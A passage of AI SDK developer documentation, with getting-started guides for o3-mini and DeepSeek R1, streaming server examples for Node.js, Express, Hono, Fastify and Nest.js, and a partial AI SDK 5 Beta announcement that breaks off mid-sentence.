- Check out our support for the o1 series of reasoning models in the OpenAI Provider.
- Check out practical examples at ai-sdk.dev/examples to see the SDK in action and get inspired for your own projects.
- Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) and multi-modal chat at ai-sdk.dev/docs/guides.
- Check out ready-to-deploy AI templates at vercel.com/templates?type=ai.
title: Get started with OpenAI o3-mini description: Get started with OpenAI o3-mini using the AI SDK. tags: ['getting-started', 'reasoning']
Get started with OpenAI o3-mini
With the release of OpenAI's o3-mini model, there has never been a better time to start building AI applications, particularly those that require complex STEM reasoning capabilities.
The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like OpenAI o3-mini alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.
OpenAI o3-mini
OpenAI recently released a new AI model optimized for STEM reasoning that excels in science, math, and coding tasks. o3-mini matches o1's performance in these domains while delivering faster responses and lower costs. The model supports tool calling, structured outputs, and system messages, making it a great option for a wide range of applications.
o3-mini offers three reasoning effort levels:
- Low: Optimized for speed while maintaining solid reasoning capabilities
- Medium: Balanced approach matching o1's performance levels
- High: Enhanced reasoning power exceeding o1 in many STEM domains
| Model | Streaming | Tool Calling | Structured Output | Reasoning Effort | Image Input |
|---|---|---|---|---|---|
| o3-mini | ✓ | ✓ | ✓ | ✓ | ✗ |
Benchmarks
OpenAI o3-mini demonstrates impressive performance across technical domains:
- 87.3% accuracy on AIME competition math questions
- 79.7% accuracy on PhD-level science questions (GPQA Diamond)
- 2130 Elo rating on competitive programming (Codeforces)
- 49.3% accuracy on verified software engineering tasks (SWE-bench)
These benchmark results were obtained using the high reasoning effort setting.
Prompt Engineering for o3-mini
The o3-mini model performs best with straightforward prompts. Some prompt engineering techniques, like few-shot prompting or instructing the model to "think step by step," may not enhance performance and can sometimes hinder it. Here are some best practices:
- Keep prompts simple and direct: The model excels at understanding and responding to brief, clear instructions without the need for extensive guidance.
- Avoid chain-of-thought prompts: Since the model performs reasoning internally, prompting it to "think step by step" or "explain your reasoning" is unnecessary.
- Use delimiters for clarity: Use delimiters like triple quotation marks, XML tags, or section titles to clearly indicate distinct parts of the input.
Getting Started with the AI SDK
The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications with React, Next.js, Vue, Svelte, Node.js, and more. Integrating LLMs into applications is complicated and heavily dependent on the specific model provider you use.
The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.
At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call OpenAI o3-mini with the AI SDK:
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
const { text } = await generateText({
model: openai('o3-mini'),
prompt: 'Explain the concept of quantum entanglement.',
});
Refining Reasoning Effort
You can control the amount of reasoning effort expended by o3-mini through the reasoningEffort parameter.
This parameter can be set to low, medium, or high to adjust how much time and computation the model spends on internal reasoning before producing a response.
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
// Reduce reasoning effort for faster responses
const { text } = await generateText({
model: openai('o3-mini'),
prompt: 'Explain quantum entanglement briefly.',
providerOptions: {
openai: { reasoningEffort: 'low' },
},
});
Generating Structured Data
While text generation can be useful, you might want to generate structured JSON data. For example, you might want to extract information from text, classify data, or generate synthetic data. AI SDK Core provides two functions (generateObject and streamObject) to generate structured data, allowing you to constrain model outputs to a specific schema.
import { generateObject } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';
const { object } = await generateObject({
model: openai('o3-mini'),
schema: z.object({
recipe: z.object({
name: z.string(),
ingredients: z.array(z.object({ name: z.string(), amount: z.string() })),
steps: z.array(z.string()),
}),
}),
prompt: 'Generate a lasagna recipe.',
});
This code snippet will generate a type-safe recipe that conforms to the specified zod schema.
Using Tools with the AI SDK
o3-mini supports tool calling out of the box, allowing it to interact with external systems and perform discrete tasks. Here's an example of using tool calling with the AI SDK:
import { generateText, tool } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';
const { text } = await generateText({
model: openai('o3-mini'),
prompt: 'What is the weather like today in San Francisco?',
tools: {
getWeather: tool({
description: 'Get the weather in a location',
parameters: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
}),
},
});
In this example, the getWeather tool allows the model to fetch real-time weather data (simulated for simplicity), enhancing its ability to provide accurate and up-to-date information.
Building Interactive Interfaces
AI SDK Core can be paired with AI SDK UI, another powerful component of the AI SDK, to streamline the process of building chat, completion, and assistant interfaces with popular frameworks like Next.js, Nuxt, and SvelteKit.
AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.
With its main hooks (useChat, useCompletion, and useObject), you can incorporate real-time chat capabilities, text completions, streamed JSON, and interactive assistant features into your app.
Let's explore building a chatbot with Next.js, the AI SDK, and OpenAI o3-mini:
In a new Next.js application, first install the AI SDK and the OpenAI provider:
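For example, with pnpm (npm, yarn, and bun work analogously):
pnpm add ai @ai-sdk/openai @ai-sdk/react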
Then, create a route handler for the chat endpoint:
import { openai } from '@ai-sdk/openai';
import { convertToModelMessages, streamText, UIMessage } from 'ai';
// Allow responses up to 5 minutes
export const maxDuration = 300;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: openai('o3-mini'),
messages: convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse();
}
Finally, update the root page (app/page.tsx) to use the useChat hook:
'use client';
import { useChat } from '@ai-sdk/react';
export default function Page() {
const { messages, input, handleInputChange, handleSubmit, error } = useChat();
return (
<>
{messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.content}
</div>
))}
<form onSubmit={handleSubmit}>
<input name="prompt" value={input} onChange={handleInputChange} />
<button type="submit">Submit</button>
</form>
</>
);
}
The useChat hook on your root page (app/page.tsx) will make a request to your AI provider endpoint (app/api/chat/route.ts) whenever the user submits a message. The messages are then displayed in the chat UI.
Get Started
Ready to get started? Here's how you can dive in:
- Explore the documentation at ai-sdk.dev/docs to understand the full capabilities of the AI SDK.
- Check out our support for o3-mini in the OpenAI Provider.
- Check out practical examples at ai-sdk.dev/examples to see the SDK in action and get inspired for your own projects.
- Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) and multi-modal chat at ai-sdk.dev/docs/guides.
- Check out ready-to-deploy AI templates at vercel.com/templates?type=ai.
title: Get started with DeepSeek R1 description: Get started with DeepSeek R1 using the AI SDK. tags: ['getting-started', 'reasoning']
Get started with DeepSeek R1
With the release of DeepSeek R1, there has never been a better time to start building AI applications, particularly those that require complex reasoning capabilities.
The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like DeepSeek R1 alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.
DeepSeek R1
DeepSeek R1 is a series of advanced AI models designed to tackle complex reasoning tasks in science, coding, and mathematics. These models are optimized to "think before they answer," producing detailed internal chains of thought that aid in solving challenging problems.
The series includes two primary variants:
- DeepSeek R1-Zero: Trained exclusively with reinforcement learning (RL) without any supervised fine-tuning. It exhibits advanced reasoning capabilities but may struggle with readability and formatting.
- DeepSeek R1: Combines reinforcement learning with cold-start data and supervised fine-tuning to improve both reasoning performance and the readability of outputs.
Benchmarks
DeepSeek R1 models excel in reasoning tasks, delivering competitive performance across key benchmarks:
- AIME 2024 (Pass@1): 79.8%
- MATH-500 (Pass@1): 97.3%
- Codeforces (Percentile): Top 4% (96.3%)
- GPQA Diamond (Pass@1): 71.5%
Prompt Engineering for DeepSeek R1 Models
DeepSeek R1 models excel with structured and straightforward prompts. The following best practices can help achieve optimal performance:
- Use a structured format: Leverage the model's preferred output structure with <think> tags for reasoning and <answer> tags for the final result.
- Prefer zero-shot prompts: Avoid few-shot prompting, as it can degrade performance; instead, state the problem directly and clearly.
- Specify output expectations: Guide the model by defining desired formats, such as markdown for readability or XML-like tags for clarity.
Getting Started with the AI SDK
The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications with React, Next.js, Vue, Svelte, Node.js, and more. Integrating LLMs into applications is complicated and heavily dependent on the specific model provider you use.
The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.
At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call DeepSeek R1 with the AI SDK:
import { deepseek } from '@ai-sdk/deepseek';
import { generateText } from 'ai';
const { reasoning, text } = await generateText({
model: deepseek('deepseek-reasoner'),
prompt: 'Explain quantum entanglement.',
});
The unified interface also means that you can easily switch between providers by changing just two lines of code. For example, to use DeepSeek R1 via Fireworks:
import { fireworks } from '@ai-sdk/fireworks';
import {
generateText,
wrapLanguageModel,
extractReasoningMiddleware,
} from 'ai';
// middleware to extract reasoning tokens
const enhancedModel = wrapLanguageModel({
model: fireworks('accounts/fireworks/models/deepseek-r1'),
middleware: extractReasoningMiddleware({ tagName: 'think' }),
});
const { reasoning, text } = await generateText({
model: enhancedModel,
prompt: 'Explain quantum entanglement.',
});
Or to use Groq's deepseek-r1-distill-llama-70b model:
import { groq } from '@ai-sdk/groq';
import {
generateText,
wrapLanguageModel,
extractReasoningMiddleware,
} from 'ai';
// middleware to extract reasoning tokens
const enhancedModel = wrapLanguageModel({
model: groq('deepseek-r1-distill-llama-70b'),
middleware: extractReasoningMiddleware({ tagName: 'think' }),
});
const { reasoning, text } = await generateText({
model: enhancedModel,
prompt: 'Explain quantum entanglement.',
});
When using DeepSeek R1 series models with third-party providers like Together AI, we recommend using the startWithReasoning option of the extractReasoningMiddleware function, as these providers may return the reasoning without the opening tag.
Model Provider Comparison
You can use DeepSeek R1 with the AI SDK through various providers. Here's a comparison of the providers that support DeepSeek R1:
| Provider | Model ID | Reasoning Tokens |
|---|---|---|
| DeepSeek | deepseek-reasoner | ✓ |
| Fireworks | accounts/fireworks/models/deepseek-r1 | Requires Middleware |
| Groq | deepseek-r1-distill-llama-70b | Requires Middleware |
| Azure | DeepSeek-R1 | Requires Middleware |
| Together AI | deepseek-ai/DeepSeek-R1 | Requires Middleware |
| FriendliAI | deepseek-r1 | Requires Middleware |
| LangDB | deepseek/deepseek-reasoner | Requires Middleware |
Building Interactive Interfaces
AI SDK Core can be paired with AI SDK UI, another powerful component of the AI SDK, to streamline the process of building chat, completion, and assistant interfaces with popular frameworks like Next.js, Nuxt, and SvelteKit.
AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.
With its main hooks (useChat, useCompletion, and useObject), you can incorporate real-time chat capabilities, text completions, streamed JSON, and interactive assistant features into your app.
Let's explore building a chatbot with Next.js, the AI SDK, and DeepSeek R1:
In a new Next.js application, first install the AI SDK and the DeepSeek provider:
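For example, with pnpm (npm, yarn, and bun work analogously):
pnpm add ai @ai-sdk/deepseek @ai-sdk/react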
Then, create a route handler for the chat endpoint:
import { deepseek } from '@ai-sdk/deepseek';
import { convertToModelMessages, streamText, UIMessage } from 'ai';
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: deepseek('deepseek-reasoner'),
messages: convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse({
sendReasoning: true,
});
}
Finally, update the root page (app/page.tsx) to use the useChat hook:
'use client';
import { useChat } from '@ai-sdk/react';
export default function Page() {
const { messages, input, handleInputChange, handleSubmit, error } = useChat();
return (
<>
{messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.reasoning && <pre>{message.reasoning}</pre>}
{message.content}
</div>
))}
<form onSubmit={handleSubmit}>
<input name="prompt" value={input} onChange={handleInputChange} />
<button type="submit">Submit</button>
</form>
</>
);
}
The useChat hook on your root page (app/page.tsx) will make a request to your AI provider endpoint (app/api/chat/route.ts) whenever the user submits a message. The messages are then displayed in the chat UI.
Limitations
While DeepSeek R1 models are powerful, they have certain limitations:
- No tool-calling support: DeepSeek R1 cannot directly interact with APIs or external tools.
- No object generation support: DeepSeek R1 does not support structured object generation. However, you can combine it with a model that supports structured object generation (like gpt-4o-mini) to generate objects, as shown in the sketch below. See the structured object generation with a reasoning model recipe for more information.
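A minimal sketch of that pattern (the prompt and schema below are our own; see the recipe for a complete version):
import { deepseek } from '@ai-sdk/deepseek';
import { openai } from '@ai-sdk/openai';
import { generateObject, generateText } from 'ai';
import { z } from 'zod';
// 1. Let DeepSeek R1 produce a free-form reasoning answer
const { text: analysis } = await generateText({
model: deepseek('deepseek-reasoner'),
prompt: 'Compare the trade-offs of solar and wind energy.',
});
// 2. Use a model with structured output support to shape the result
const { object } = await generateObject({
model: openai('gpt-4o-mini'),
schema: z.object({
pros: z.array(z.string()),
cons: z.array(z.string()),
}),
prompt: `Extract the pros and cons from this analysis: ${analysis}`,
});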
Get Started
Ready to dive in? Here's how you can begin:
- Explore the documentation at ai-sdk.dev/docs to understand the capabilities of the AI SDK.
- Check out practical examples at ai-sdk.dev/examples to see the SDK in action.
- Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) at ai-sdk.dev/docs/guides.
- Use ready-to-deploy AI templates at vercel.com/templates?type=ai.
DeepSeek R1 opens new opportunities for reasoning-intensive AI applications. Start building today and leverage the power of advanced reasoning in your AI projects.
title: Guides description: Learn how to build AI applications with the AI SDK
Guides
These use-case specific guides are intended to help you build real applications with the AI SDK.
<IndexCards cards={[ { title: 'RAG Chatbot', description: 'Learn how to build a retrieval-augmented generation chatbot with the AI SDK.', href: '/docs/guides/rag-chatbot', }, { title: 'Multimodal Chatbot', description: 'Learn how to build a multimodal chatbot with the AI SDK.', href: '/docs/guides/multi-modal-chatbot', }, { title: 'Get started with Llama 3.1', description: 'Get started with Llama 3.1 using the AI SDK.', href: '/docs/guides/llama-3_1', }, { title: 'Get started with OpenAI o1', description: 'Get started with OpenAI o1 using the AI SDK.', href: '/docs/guides/o1', }, ]} />
title: Node.js HTTP Server description: Learn how to use the AI SDK in a Node.js HTTP server tags: ['api servers', 'streaming']
Node.js HTTP Server
You can use the AI SDK in a Node.js HTTP server to generate text and stream it to the client.
Examples
The examples start a simple HTTP server that listens on port 8080. You can test it using curl, for example:
curl -X POST http://localhost:8080
Full example: github.com/vercel/ai/examples/node-http-server
Data Stream
You can use the pipeDataStreamToResponse method to pipe the stream data to the server response.
import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';
import { createServer } from 'http';
createServer(async (req, res) => {
const result = streamText({
model: openai('gpt-4o'),
prompt: 'Invent a new holiday and describe its traditions.',
});
result.pipeDataStreamToResponse(res);
}).listen(8080);
Sending Custom Data
pipeDataStreamToResponse can be used to send custom data to the client.
import { openai } from '@ai-sdk/openai';
import { pipeDataStreamToResponse, streamText } from 'ai';
import { createServer } from 'http';
createServer(async (req, res) => {
// immediately start streaming the response
pipeDataStreamToResponse(res, {
execute: async dataStreamWriter => {
dataStreamWriter.writeData('initialized call');
const result = streamText({
model: openai('gpt-4o'),
prompt: 'Invent a new holiday and describe its traditions.',
});
result.mergeIntoDataStream(dataStreamWriter);
},
onError: error => {
// Error messages are masked by default for security reasons.
// If you want to expose the error message to the client, you can do so here:
return error instanceof Error ? error.message : String(error);
},
});
}).listen(8080);
Text Stream
You can send a text stream to the client using pipeTextStreamToResponse.
import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';
import { createServer } from 'http';
createServer(async (req, res) => {
const result = streamText({
model: openai('gpt-4o'),
prompt: 'Invent a new holiday and describe its traditions.',
});
result.pipeTextStreamToResponse(res);
}).listen(8080);
Troubleshooting
- Streaming not working when proxied
title: Express description: Learn how to use the AI SDK in an Express server tags: ['api servers', 'streaming']
Express
You can use the AI SDK in an Express server to generate and stream text and objects to the client.
Examples
The examples start a simple HTTP server that listens on port 8080. You can test it using curl, for example:
curl -X POST http://localhost:8080
Full example: github.com/vercel/ai/examples/express
Data Stream
You can use the pipeDataStreamToResponse method to pipe the stream data to the server response.
import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';
import express, { Request, Response } from 'express';
const app = express();
app.post('/', async (req: Request, res: Response) => {
const result = streamText({
model: openai('gpt-4o'),
prompt: 'Invent a new holiday and describe its traditions.',
});
result.pipeDataStreamToResponse(res);
});
app.listen(8080, () => {
console.log(`Example app listening on port ${8080}`);
});
Sending Custom Data
pipeDataStreamToResponse can be used to send custom data to the client.
import { openai } from '@ai-sdk/openai';
import { pipeDataStreamToResponse, streamText } from 'ai';
import express, { Request, Response } from 'express';
const app = express();
app.post('/stream-data', async (req: Request, res: Response) => {
// immediately start streaming the response
pipeDataStreamToResponse(res, {
execute: async dataStreamWriter => {
dataStreamWriter.writeData('initialized call');
const result = streamText({
model: openai('gpt-4o'),
prompt: 'Invent a new holiday and describe its traditions.',
});
result.mergeIntoDataStream(dataStreamWriter);
},
onError: error => {
// Error messages are masked by default for security reasons.
// If you want to expose the error message to the client, you can do so here:
return error instanceof Error ? error.message : String(error);
},
});
});
app.listen(8080, () => {
console.log(`Example app listening on port ${8080}`);
});
Text Stream
You can send a text stream to the client using pipeTextStreamToResponse.
import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';
import express, { Request, Response } from 'express';
const app = express();
app.post('/', async (req: Request, res: Response) => {
const result = streamText({
model: openai('gpt-4o'),
prompt: 'Invent a new holiday and describe its traditions.',
});
result.pipeTextStreamToResponse(res);
});
app.listen(8080, () => {
console.log(`Example app listening on port ${8080}`);
});
Troubleshooting
- Streaming not working when proxied
title: Hono description: Example of using the AI SDK in a Hono server. tags: ['api servers', 'streaming']
Hono
You can use the AI SDK in a Hono server to generate and stream text and objects to the client.
Examples
The examples start a simple HTTP server that listens on port 8080. You can test it using curl, for example:
curl -X POST http://localhost:8080
Full example: github.com/vercel/ai/examples/hono
Data Stream
You can use the toDataStream method to get a data stream from the result and then pipe it to the response.
import { openai } from '@ai-sdk/openai';
import { serve } from '@hono/node-server';
import { streamText } from 'ai';
import { Hono } from 'hono';
import { stream } from 'hono/streaming';
const app = new Hono();
app.post('/', async c => {
const result = streamText({
model: openai('gpt-4o'),
prompt: 'Invent a new holiday and describe its traditions.',
});
// Mark the response as a v1 data stream:
c.header('X-Vercel-AI-Data-Stream', 'v1');
c.header('Content-Type', 'text/plain; charset=utf-8');
return stream(c, stream => stream.pipe(result.toDataStream()));
});
serve({ fetch: app.fetch, port: 8080 });
Sending Custom Data
createDataStream can be used to send custom data to the client.
import { openai } from '@ai-sdk/openai';
import { serve } from '@hono/node-server';
import { createDataStream, streamText } from 'ai';
import { Hono } from 'hono';
import { stream } from 'hono/streaming';
const app = new Hono();
app.post('/stream-data', async c => {
// immediately start streaming the response
const dataStream = createDataStream({
execute: async dataStreamWriter => {
dataStreamWriter.writeData('initialized call');
const result = streamText({
model: openai('gpt-4o'),
prompt: 'Invent a new holiday and describe its traditions.',
});
result.mergeIntoDataStream(dataStreamWriter);
},
onError: error => {
// Error messages are masked by default for security reasons.
// If you want to expose the error message to the client, you can do so here:
return error instanceof Error ? error.message : String(error);
},
});
// Mark the response as a v1 data stream:
c.header('X-Vercel-AI-Data-Stream', 'v1');
c.header('Content-Type', 'text/plain; charset=utf-8');
return stream(c, stream =>
stream.pipe(dataStream.pipeThrough(new TextEncoderStream())),
);
});
serve({ fetch: app.fetch, port: 8080 });
Text Stream
You can use the textStream property to get a text stream from the result and then pipe it to the response.
import { openai } from '@ai-sdk/openai';
import { serve } from '@hono/node-server';
import { streamText } from 'ai';
import { Hono } from 'hono';
import { stream } from 'hono/streaming';
const app = new Hono();
app.post('/', async c => {
const result = streamText({
model: openai('gpt-4o'),
prompt: 'Invent a new holiday and describe its traditions.',
});
c.header('Content-Type', 'text/plain; charset=utf-8');
return stream(c, stream => stream.pipe(result.textStream));
});
serve({ fetch: app.fetch, port: 8080 });
Troubleshooting
- Streaming not working when proxied
title: Fastify description: Learn how to use the AI SDK in a Fastify server tags: ['api servers', 'streaming']
Fastify
You can use the AI SDK in a Fastify server to generate and stream text and objects to the client.
Examples
The examples start a simple HTTP server that listens on port 8080. You can test it using curl, for example:
curl -X POST http://localhost:8080
Full example: github.com/vercel/ai/examples/fastify
Data Stream
You can use the toDataStream method to get a data stream from the result and then pipe it to the response.
import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';
import Fastify from 'fastify';
const fastify = Fastify({ logger: true });
fastify.post('/', async function (request, reply) {
const result = streamText({
model: openai('gpt-4o'),
prompt: 'Invent a new holiday and describe its traditions.',
});
// Mark the response as a v1 data stream:
reply.header('X-Vercel-AI-Data-Stream', 'v1');
reply.header('Content-Type', 'text/plain; charset=utf-8');
return reply.send(result.toDataStream());
});
fastify.listen({ port: 8080 });
Sending Custom Data
createDataStream can be used to send custom data to the client.
import { openai } from '@ai-sdk/openai';
import { createDataStream, streamText } from 'ai';
import Fastify from 'fastify';
const fastify = Fastify({ logger: true });
fastify.post('/stream-data', async function (request, reply) {
// immediately start streaming the response
const dataStream = createDataStream({
execute: async dataStreamWriter => {
dataStreamWriter.writeData('initialized call');
const result = streamText({
model: openai('gpt-4o'),
prompt: 'Invent a new holiday and describe its traditions.',
});
result.mergeIntoDataStream(dataStreamWriter);
},
onError: error => {
// Error messages are masked by default for security reasons.
// If you want to expose the error message to the client, you can do so here:
return error instanceof Error ? error.message : String(error);
},
});
// Mark the response as a v1 data stream:
reply.header('X-Vercel-AI-Data-Stream', 'v1');
reply.header('Content-Type', 'text/plain; charset=utf-8');
return reply.send(dataStream);
});
fastify.listen({ port: 8080 });
Text Stream
You can use the textStream property to get a text stream from the result and then pipe it to the response.
import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';
import Fastify from 'fastify';
const fastify = Fastify({ logger: true });
fastify.post('/', async function (request, reply) {
const result = streamText({
model: openai('gpt-4o'),
prompt: 'Invent a new holiday and describe its traditions.',
});
reply.header('Content-Type', 'text/plain; charset=utf-8');
return reply.send(result.textStream);
});
fastify.listen({ port: 8080 });
Troubleshooting
- Streaming not working when proxied
title: Nest.js description: Learn how to use the AI SDK in a Nest.js server tags: ['api servers', 'streaming']
Nest.js
You can use the AI SDK in a Nest.js server to generate and stream text and objects to the client.
Examples
The examples show how to implement a Nest.js controller that uses the AI SDK to stream text and objects to the client.
Full example: github.com/vercel/ai/examples/nest
Data Stream
You can use the pipeDataStreamToResponse method to get a data stream from the result and then pipe it to the response.
import { Controller, Post, Res } from '@nestjs/common';
import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';
import { Response } from 'express';
@Controller()
export class AppController {
@Post()
async example(@Res() res: Response) {
const result = streamText({
model: openai('gpt-4o'),
prompt: 'Invent a new holiday and describe its traditions.',
});
result.pipeDataStreamToResponse(res);
}
}
Sending Custom Data
pipeDataStreamToResponse can be used to send custom data to the client.
import { Controller, Post, Res } from '@nestjs/common';
import { openai } from '@ai-sdk/openai';
import { pipeDataStreamToResponse, streamText } from 'ai';
import { Response } from 'express';
@Controller()
export class AppController {
@Post('/stream-data')
async streamData(@Res() res: Response) {
pipeDataStreamToResponse(res, {
execute: async dataStreamWriter => {
dataStreamWriter.writeData('initialized call');
const result = streamText({
model: openai('gpt-4o'),
prompt: 'Invent a new holiday and describe its traditions.',
});
result.mergeIntoDataStream(dataStreamWriter);
},
onError: error => {
// Error messages are masked by default for security reasons.
// If you want to expose the error message to the client, you can do so here:
return error instanceof Error ? error.message : String(error);
},
});
}
}
Text Stream
You can use the pipeTextStreamToResponse method to get a text stream from the result and then pipe it to the response.
import { Controller, Post, Res } from '@nestjs/common';
import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';
import { Response } from 'express';
@Controller()
export class AppController {
@Post()
async example(@Res() res: Response) {
const result = streamText({
model: openai('gpt-4o'),
prompt: 'Invent a new holiday and describe its traditions.',
});
result.pipeTextStreamToResponse(res);
}
}
Troubleshooting
- Streaming not working when proxied
title: AI SDK by Vercel description: The AI SDK is the TypeScript toolkit for building AI applications and agents with React, Next.js, Vue, Svelte, Node.js, and more.
AI SDK
The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications and agents with React, Next.js, Vue, Svelte, Node.js, and more.
Why use the AI SDK?
Integrating large language models (LLMs) into applications is complicated and heavily dependent on the specific model provider you use.
The AI SDK standardizes integrating artificial intelligence (AI) models across supported providers. This enables developers to focus on building great AI applications, not waste time on technical details.
For example, here’s how you can generate text with various models using the AI SDK:
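A minimal sketch with the OpenAI provider (swap the provider import and model ID to target a different provider):
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
const { text } = await generateText({
  model: openai('gpt-4o'),
  prompt: 'What is love?',
});
console.log(text);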
The AI SDK has two main libraries:
- AI SDK Core: A unified API for generating text, structured objects, tool calls, and building agents with LLMs.
- AI SDK UI: A set of framework-agnostic hooks for quickly building chat and generative user interfaces.
Model Providers
The AI SDK supports multiple model providers.
Templates
We've built some templates that include AI SDK integrations for different use cases, providers, and frameworks. You can use these templates to get started with your AI-powered application.
Starter Kits
Feature Exploration
Frameworks
Generative UI
Security
Join our Community
If you have questions about anything related to the AI SDK, you're always welcome to ask our community on GitHub Discussions.
llms.txt (for Cursor, Windsurf, Copilot, Claude etc.)
You can access the entire AI SDK documentation in Markdown format at ai-sdk.dev/llms.txt. This can be used to ask any LLM (assuming it has a big enough context window) questions about the AI SDK based on the most up-to-date documentation.
Example Usage
For instance, to prompt an LLM with questions about the AI SDK:
- Copy the documentation contents from ai-sdk.dev/llms.txt
- Use the following prompt format:
Documentation:
{paste documentation here}
---
Based on the above documentation, answer the following:
{your question}
title: AI SDK 5 Beta description: Get started with the Beta version of AI SDK 5.
Announcing AI SDK 5 Beta
Beta Version Guidance
The AI SDK 5 Beta is intended for:
- New projects where you can adopt the latest patterns from the start
- Trying out new features and giving us feedback on the developer experience
- Experimenting with migrations from v4 to understand the upgrade path
- Development and testing environments where you can iterate quickly
Short on time? Wait for the stable release. We're focusing on polish and migration tooling improvements.
For production applications: Experiment with migrations in development, but avoid fully migrating production systems. Use this beta period to understand the changes and prepare your migration strategy.
What to Expect in Beta
- No major breaking changes - the architecture is stable
- Minor breaking changes possible - we may refine APIs for critical bugfixes
- Bug fixes and DX improvements - active development continues
Your feedback during this beta phase directly shapes the final stable release. Share your experiences through GitHub issues.
Installation
To install the AI SDK 5 Beta, run the following command:
# replace with your provider and framework
npm install ai@beta @ai-sdk/openai@beta @ai-sdk/react@beta
What's new in AI SDK 5?
AI SDK 5 is a redesign of the AI SDK's protocol and architecture based on everything we learned over the last two years of real-world usage. We also modernized the UI and protocols that have remained largely unchanged since AI SDK v2/3, to create a strong foundation for the future.
Why a new specification (LanguageModelV2)?
When we originally designed the v1 protocol over a year ago, the standard interaction pattern with language models was text in, text or tool call out. Today's LLMs go beyond text and tool calls, generating reasoning, sources, images and more. New use cases like computer-using agents introduce a fundamentally different approach to interacting with language models that made it impossible to support in a unified approach with our original architecture.
We needed a protocol designed for this new reality. While this is a breaking change that we take seriously, it provided an opportunity to rebuild the foundation and add new features.
New Features
- LanguageModelV2 - new redesigned architecture
- Message Overhaul - new UIMessage and ModelMessage types
- Server-Sent Events (SSE) - new standardised protocol for sending UI messages to the client
- Agentic Control - new primitives for building agentic systems
- Enhanced useChat Architecture - improved state management with transport system
LanguageModelV2
LanguageModelV2 represents a complete redesign of how the AI SDK communicates with language models, adapting to the increasingly complex outputs modern AI systems generate. The new LanguageModelV2 treats all LLM outputs as content parts, enabling consistent handling of text, images, reasoning, sources, and other response types. It has:
- Content-First Design - Rather than separating text, reasoning, and tool calls, everything is represented as ordered content parts in a unified array
- Improved Type Safety - The new LanguageModelV2 provides better TypeScript type guarantees, making it easier to work with different content types
- Extensibility - Adding support for new model capabilities requires no changes to the core structure
Message Overhaul
AI SDK 5 introduces a completely redesigned message system with two message types that address the dual needs of what you render in your UI and what you send to the model. Context is crucial for effective language model generations, and these message types serve distinct purposes:
- UIMessage represents the complete conversation history for your interface, preserving all message parts (text, images, data), metadata (creation timestamps, generation times), and UI state.
- ModelMessage is optimized for sending to language models, considering token input constraints. It strips away UI-specific metadata and irrelevant content.
With this change, you must explicitly convert your UIMessages to ModelMessages before sending them to the model.
import { openai } from '@ai-sdk/openai';
import { convertToModelMessages, streamText, UIMessage } from 'ai';
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: openai('gpt-4o'),
messages: convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse();
}
The new message system makes several highly requested features possible:
- Type-safe Message Metadata - Add structured information per message
- Type-safe Tool Calls - Improved type safety when defining and using tools in your messages
- New Stream Writer - Stream any part type (reasoning, sources, etc.) retaining proper order
- Data Parts - Stream type-safe arbitrary data parts for dynamic UI components
Type-safe Tool Calls
AI SDK 5 introduces type-safe tool calls in UI messages. Instead of generic tool-invocation types, tool parts use specific naming: tool-${toolName}. This provides better type safety and makes it easier to handle many tools in your UI.
// Generic tool-invocation type
{
message.parts.map(part => {
if (part.type === 'tool-invocation') {
return <div>{part.toolInvocation.toolName}</div>;
}
});
}
// Type-safe tool parts with specific names
{
message.parts.map(part => {
switch (part.type) {
case 'tool-getWeatherInformation':
return <div>Getting weather...</div>;
case 'tool-askForConfirmation':
return <div>Asking for confirmation...</div>;
}
});
}
Message metadata
Metadata allows you to attach structured information to individual messages, making it easier to track details like response time, token usage, or model specifications. This information can enhance your UI with contextual data without embedding it in the message content itself.
To add metadata to a message, first define the metadata schema:
import { z } from 'zod';
export const exampleMetadataSchema = z.object({
duration: z.number().optional(),
model: z.string().optional(),
totalTokens: z.number().optional(),
});
export type ExampleMetadata = z.infer<typeof exampleMetadataSchema>;
Then add the metadata using the message.metadata property on the toUIMessageStreamResponse() utility:
